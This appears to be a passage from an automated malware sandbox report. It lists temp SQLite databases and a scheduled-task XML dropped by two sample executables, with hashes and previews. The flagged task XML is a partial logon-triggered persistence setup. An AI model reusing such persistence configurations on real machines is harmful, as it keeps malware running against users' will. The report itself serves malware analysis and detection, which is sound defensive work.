                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2916.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2926.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2937.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2957.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp296.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2A7.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2B7.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2B8.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3B4E.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3B5E.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3B5F.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3B70.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3B81.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3B91.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3BA2.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3BB2.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp3BC3.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp4733.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1595
                                                        Entropy (8bit):5.098188099867554
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL0xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTwv
                                                        MD5:4700BC65C015B33E95795A2C680A45A0
                                                        SHA1:EC1119C04CDC067D631E546B7EF967898F2220FD
                                                        SHA-256:257BBDE300ABF787E0519345C28AB5DC99DBA0E2988F22D8D724EB51888FEAFF
                                                        SHA-512:E322A63621A4BF0A137EE2685663E7EDF8B81D74B9E96495F608031F03E1E3CF0036B0D755C24DCE39FC98D8736128E157B999BD7A8E8A06CFBD3BB9A9D47C79
                                                        Malicious:true
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                        C:\Users\user\AppData\Local\Temp\tmp53D5.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F2D.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F4E.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F4F.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F5F.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F70.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F71.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
